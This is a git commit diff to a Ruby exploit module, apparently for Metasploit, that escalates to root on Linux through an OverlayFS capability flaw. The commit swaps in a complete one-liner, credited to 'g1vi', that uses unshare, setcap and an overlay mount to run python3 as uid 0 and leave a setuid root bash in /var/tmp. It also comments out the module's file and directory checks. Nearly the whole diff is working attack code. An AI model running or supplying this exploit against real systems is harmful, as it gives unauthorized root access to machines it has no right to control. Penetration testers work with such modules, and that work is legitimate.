expirement w g1vi exploit

Corey · Corey · commit becef218eb85 · 2024-08-30T18:22:50.000-04:00
diff --git a/modules/exploits/linux/local/game_overlay_privesc.rb b/modules/exploits/linux/local/game_overlay_privesc.rb
@@ -105,22 +105,22 @@ def check
   def exploit
     # Still need to figure out if meterpreter or shell can interact with the spawned process 
     # So we can run a shell without having to drop a new executable
-    print_status "Running exploit..."
-
     payload_file = datastore['PayloadFilename']
     register_file_for_cleanup payload
 
     # Write payload file
     print_status "payload_file: #{payload_file}"
 
-    Failure::BadConfig "#{payload_file} already exists" if file? payload_file
-    Failure::BadConfig "Current directory isn't writeable" unless writable? '.' 
+    #Failure::BadConfig "#{payload_file} already exists" if file? payload_file
+    #Failure::BadConfig "Current directory isn't writeable" unless writable? '.' 
 
     write_file payload_file, generate_payload.generate
 
     # run shell in a different namespace, add setuid capabilities and create a new mount point 
     # Based on g1vi exploit: "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" 
-    hack = "unshare -rm sh -c \"mkdir l u w m && cp #{payload_file} l/; setcap cap_setuid+eip l/#{payload_file}; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; && chmod 4755 /u/#{payload_file} && /u/#{payload_file}" # && rm -rf l/ m/ u/ w/ #{payload} }
+    hack = "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" 
+    #"unshare -rm sh -c \"mkdir l u w m && cp #{payload_file} l/; setcap cap_setuid+eip l/#{payload_file}; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; && chmod 4755 /u/#{payload_file} && /u/#{payload_file}" # && rm -rf l/ m/ u/ w/ #{payload} }
+    
     print_status("Running exploit '#{hack}'")
     cmd_exec hack
   end
